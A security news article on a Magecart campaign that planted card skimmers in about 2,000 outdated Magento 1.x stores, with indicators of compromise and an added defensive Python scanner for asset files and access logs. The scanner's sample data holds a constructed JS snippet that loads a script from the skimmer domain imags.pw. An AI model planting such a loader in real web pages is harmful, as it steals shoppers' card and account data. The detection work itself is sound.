A large-scale Magecart campaign compromised customers’ private information in more than 2,000 Magento stores, according to researchers at Sanguine Security (Sansec). The automated campaign reached tens of thousands of customers and is possibly the largest Magecart attack since 2015; the largest previously recorded by the company involved 962 stores.
The researchers noted that no administrator account was required to carry out the attacks. The Dutch cybersecurity firm said the attackers gained write access to the server through zero-day vulnerabilities in Magento 1.x. The company also noted that an exploit kit had recently been put up for sale on dark web hacking forums by a user named z3r0day.
Outdated software vulnerabilities have exposed Magento stores to attacks
Most of the affected Magento stores had no record of recent security incidents, suggesting that the Magecart attack exploited the software used to build the stores. Magento 1.x has not received updates since June 2020, exposing sites to zero-day vulnerabilities found in the wild. Security experts suggested that the hackers discovered the vulnerabilities earlier but waited until the software reached its end of life (EOL) before exploiting them.
Researchers also found a user named z3r0day selling a Magento remote code mining kit and an instructional video for $5,000. The hacker promised potential buyers that Adobe would not fix the software vulnerability because Magento 1.x had reached the end of its life. Hence, Magento eCommerce store owners had no way to protect their stores from the Magecart attack.
Adobe issued an alert in November 2019 regarding a possible Magecart attack on sites running the outdated Magento 1.x version of the software. Similar concerns were echoed by MasterCard and Visa. Adobe’s efforts to convince Magento store owners to migrate from version 1.x to version 2.x have reduced the number of vulnerable stores from 240,000 to around 95,000. However, many Magento store owners are unaware of the software vulnerability and will likely continue to use the outdated software.
Commenting on Magecart’s attack on Magento stores, Paul Bischoff, a privacy advocate at Comparitech, said: “Hackers can easily search for outdated versions of Magento and use automated bots to access them, download shell scripts, and install the card skimming malware. Card skimming attacks are undetectable by end users, so it is the responsibility of website operators to update their systems to the latest version of Magento. At this point, any website using Magento 1.x should be assumed to be compromised.”
Sansec researchers have said that the profitability of web skimming is a contributing factor to the increase in these attacks. Therefore, obsolete Magento stores will remain attractive targets for attackers wishing to steal personal, account and financial data of online customers.
Chris Hauk, Consumer Privacy Champion with Pixel Privacy, says:
“These site skimming attacks will continue to increase in frequency as long as the bad actors in the world can continue to profit from them. This highlights the need for online merchants to ensure that their online stores are running the latest version of software available, which is probably more resilient against this type of attack than outdated and obsolete software.”
Magecart Attack Indicators of Compromise (IoCs)
The threat intelligence firm said that the Magecart attack primarily affected stores running the Magento 1.x branch of the software. The researchers added that the attackers used the IP addresses 184.108.40.206 (US) and 220.127.116.11 (OVH, FR) to interact with the Magento administration panel. They also used the “Magento Connect” feature to download and install various files, including a malware payload named “mysql.php”. The file deleted itself after adding malicious code to prototype.js on Magento 1.x stores and to jquery.js on Magento 2.x stores.
The attackers also added a skimmer loader that exfiltrated data from Magento stores to a site at https://imags.pw/502.jsp, hosted in Moscow. According to Sansec researchers, the malicious site shared a network with avouen.net, the domain that hosted one of the malicious scripts.
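A defender-side check that turns the indicators above into something a store operator can run against their own JavaScript assets and web server access logs, as an added example (not Sansec’s code): it flags the named domains inside the modified assets and requests from the named IP addresses to the admin panel or Magento Connect Manager. It assumes Magento 1’s default paths of /index.php/admin/ and /downloader/ (installations that rename the admin route should adjust SENSITIVE_PATH), and the sample JS and log lines are constructed for the demonstration.

```python
import re
from typing import Iterable

# Indicators named in the article above.
IOC_DOMAINS = ("imags.pw", "avouen.net")
IOC_IPS = frozenset({"184.108.40.206", "220.127.116.11"})
# Assets the article says the payload modified: prototype.js (Magento 1.x), jquery.js (Magento 2.x).
WATCHED_ASSETS = frozenset({"prototype.js", "jquery.js"})
# Assumed defaults: Magento 1 serves the Magento Connect Manager from /downloader/
# and the admin panel from /index.php/admin/ (adjust if your install renamed the admin route).
SENSITIVE_PATH = re.compile(r"^/(downloader|index\.php/admin|admin)(/|$)")
# Apache/Nginx combined log format: client IP first, request line in quotes.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+)[^"]*"')


def scan_asset(filename: str, content: str) -> list[str]:
    """Return the IoC domains referenced in a watched JS asset (empty if clean or not watched)."""
    if filename.rsplit("/", 1)[-1] not in WATCHED_ASSETS:
        return []
    # Match the domain as a whole host label, not as a substring of another host.
    return [d for d in IOC_DOMAINS
            if re.search(r"(?<![\w.-])" + re.escape(d) + r"(?![\w-])", content)]


def scan_access_log(lines: Iterable[str]) -> list[tuple[str, str]]:
    """Return (ip, path) for requests from IoC IPs to the admin panel or Magento Connect."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if m and m["ip"] in IOC_IPS and SENSITIVE_PATH.match(m["path"]):
            hits.append((m["ip"], m["path"]))
    return hits


# Constructed sample data for the demonstration; not real captured traffic or a real asset.
SAMPLE_JS = ("var Prototype={Version:'1.7'};\n"
             "(function(){var s=document.createElement('script');"
             "s.src='https://imags.pw/502.jsp';document.head.appendChild(s);})();\n")
SAMPLE_LOG = [
    '184.108.40.206 - - [12/Sep/2020:10:01:02 +0000] "POST /downloader/index.php HTTP/1.1" 200 512',
    '203.0.113.9 - - [12/Sep/2020:10:01:05 +0000] "GET /index.php/checkout/cart/ HTTP/1.1" 200 7190',
    '220.127.116.11 - - [12/Sep/2020:10:02:40 +0000] "GET /index.php/admin/ HTTP/1.1" 200 4021',
    '220.127.116.11 - - [12/Sep/2020:10:02:41 +0000] "GET /js/prototype/prototype.js HTTP/1.1" 200 160000',
]

if __name__ == "__main__":
    print(scan_asset("js/prototype/prototype.js", SAMPLE_JS))  # ['imags.pw']
    print(scan_access_log(SAMPLE_LOG))
```

A hit from either check warrants restoring the asset from a known-good source and reviewing the full admin and downloader history for that period, since the payload removed itself after patching the file.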
Sansec telemetry identified 1,904 Magento stores with keyloggers installed on payment pages. Over the period monitored by the company, 10 Magento stores were infected on Friday, 1,058 on Saturday, 603 on Sunday and 233 on Monday. The infection pattern suggests that the vulnerability could have affected more stores than initially expected.